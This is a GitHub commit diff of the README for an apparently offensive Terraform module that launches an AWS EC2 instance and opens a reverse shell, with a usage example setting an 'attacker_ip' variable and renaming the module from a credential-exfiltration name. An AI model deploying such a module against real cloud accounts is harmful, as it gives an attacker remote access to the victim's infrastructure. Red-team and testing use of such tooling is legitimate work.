We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 1a8cb20 commit efbfd66Copy full SHA for efbfd66
README.md
@@ -10,12 +10,12 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an
10
11
## Usage
12
```
13
-module "ec2_instance_credential_exfiltration" {
+module "ec2-instance-reverse-shell" {
14
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
15
16
subnet_id = "subnet-0a4a1cc04"
17
attacker_ip = "0.0.0.0"
18
}
19
20
## Author
21
-Module managed by https://github.com/iganbold
+Module managed by https://github.com/iganbold
0 commit comments